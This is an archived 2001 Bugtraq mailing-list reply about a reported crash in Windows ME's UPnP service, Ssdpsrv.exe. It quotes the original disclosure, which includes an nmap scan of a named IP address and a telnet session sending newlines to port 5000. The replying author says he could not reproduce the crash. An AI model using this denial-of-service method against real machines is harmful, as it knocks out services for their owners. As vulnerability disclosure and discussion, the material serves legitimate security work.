Re: Ssdpsrv.exe in WindowsME

From: ~ (resoat_private)
Date: Sat Oct 20 2001 - 03:02:10 PDT


    One of my PCs runs Windows ME so I tried to replicate the crash but to no
    avail.
    I can send 3 newline commands then I get the "HTTP/1.1 400 Bad Request" but
    Ssdpsrv.exe does not crash.
    I know Microsoft aren't always that great at security but making a program
    that crashes after 3 new line commands seems a little silly even for them
    :-)
    The ME install was a custom install and the service was running so I think
    there's a definite link there.
    
    Rob Mears
    http://www.securitywriters.org
    
    
    
    
    
    ----- Original Message -----
    From: "milo omega" <mtwoarat_private>
    To: <bugtraqat_private>
    Sent: Thursday, October 18, 2001 1:46 AM
    Subject: Ssdpsrv.exe in WindowsME
    
    
    > By connecting to a computer running Ssdpsrv you are able to crash the
    > Ssdpsrv server.
    >
    > Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes.
    > This service comes standard with the WindowsME installation.
    >
    > The Ssdpsrv.exe server is started at boot.
    > Here is the registry entry:
    >   HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
    > Here is the file that starts the server:
    >   c:\windows\system\ssdpsrv.exe
    >
    > For information about UPnP go here:
    >   http://support.microsoft.com/support/kb/articles/Q262/4/58.ASP
    >
    > Upon running a scan on a computer running the server I get the following:
    > <snip>
    >   bash-2.05$ nmap -sT 165.121.234.217
    >   Starting nmap V. 2.54BETA29 ( www.insecure.org/nmap/ )
    >   Interesting ports on user-2injqmp.dialup.mindspring.com (165.121.234.217):
    >   (The 1547 ports scanned but not shown below are in state: closed)
    >   Port       State       Service
    >   139/tcp    open        netbios-ssn
    >   5000/tcp   open        fics
    >   Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds
    > </snap>
    >
    > Method to crash Ssdpsrv:
    >   Connect to the computer on port 5000.
    >   Send 3 to 5 newline characters.
    >   You then get an error and are disconnected.
    > <snip>
    >   bash-2.05$ telnet 165.121.234.217 5000
    >   Trying 165.121.234.217...
    >   Connected to 165.121.234.217.
    >   Escape character is '^]'.
    >
    >
    >
    >   HTTP/1.1 400 Bad Request
    >
    >   Connection closed by foreign host.
    >   bash-2.05$
    > </snap>
    >
    > Here is the error caused by the crash:
    >   Ssdpsrv has caused an error in MSVCRT.DLL.
    >   Ssdpsrv will now close.
    >   If you continue to experience problems,
    >   try restarting your computer.
    >
    > This causes the server crash and closes port 5000.
    > Either you must restart the server by manually running ssdpsrv.exe
    > or reboot.
    >
    > shouts to pulltheplug #c.
    > :o
    >
    >
    



    This archive was generated by hypermail 2b30 : Sat Oct 20 2001 - 08:16:46 PDT